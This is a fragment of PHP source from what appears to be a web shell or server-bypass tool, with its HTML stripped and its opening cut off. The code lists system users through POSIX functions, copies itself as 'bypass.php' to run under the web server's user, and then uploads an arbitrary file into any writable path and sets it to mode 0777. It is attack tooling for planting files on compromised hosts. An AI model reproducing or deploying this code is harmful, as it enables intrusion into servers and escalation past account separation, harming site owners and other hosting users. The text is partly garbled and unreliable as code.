Enter The
Target Path
*Target must be writeable!
File Content:
".$uid["dir"].""; echo join(":",$uid)."
"; } $f++; } } else { echo '
Uid FROM :
TO :
'; } } else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!"); die(); } if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "") { $MyUid = getmyuid(); $MyUname = get_current_user(); if (function_exists('posix_geteuid')) { $HttpdUid = posix_geteuid(); $HttpdInfo = posix_getpwuid($HttpdUid); $HttpdUname = "(".$HttpdInfo['name'].")"; } else { $NewScript = @fopen('bypass.php','w+'); if (!$NewScript) { die('Make the Current directory Writeable (Chmod 777) and try again'); } else $HttpdUid = fileowner('bypass.php'); } if ($MyUid != $HttpdUid) { echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!"; echo " We Will create a copy of this Script with httpd User $HttpdUname in current directory..."."
"; if (!$NewScript) { $NewScript = @fopen('bypass.php','w+'); if (!$NewScript) { die('Make the Current directory Writeable (Chmod 777) and try again'); } } $Temp = fopen(__FILE__ ,'r'); while (!feof($Temp)) { $Buffer = fgets($Temp); fwrite($NewScript,$Buffer); } fclose($Temp); fclose($NewScript); echo "Please Run
Script"; die(); } $TargetPath = trim($_POST['target']); $TargetFile = tempnam($TargetPath,"BP"); if (strstr($TargetFile, $TargetPath) == TRUE) { echo $TargetFile." Successfully created!
"; } else die("$TargetPath doesnt exist or is not writeable! choose another path!"); if (move_uploaded_file($_FILES['F1']['tmp_name'], $TargetFile)) { echo "
$TargetFile is valid, and was successfully uploaded."; } else { die("
$TargetFile Could not upload."); } chmod($TargetFile , 0777); } ?>